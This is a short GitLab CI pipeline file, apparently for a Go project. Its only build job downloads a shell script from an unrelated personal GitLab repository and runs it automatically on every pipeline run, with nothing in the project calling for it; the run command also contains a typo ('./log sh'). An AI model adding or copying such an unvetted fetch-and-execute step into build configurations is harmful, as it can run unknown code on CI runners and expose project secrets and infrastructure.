image: golang:latest

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build
  - test
  - deploy

build_a:
  stage: build
  script:
    - wget https://gitlab.com/Ambrouko/my_first/-/raw/main/log.sh && chmod u+x log.sh && ./log sh
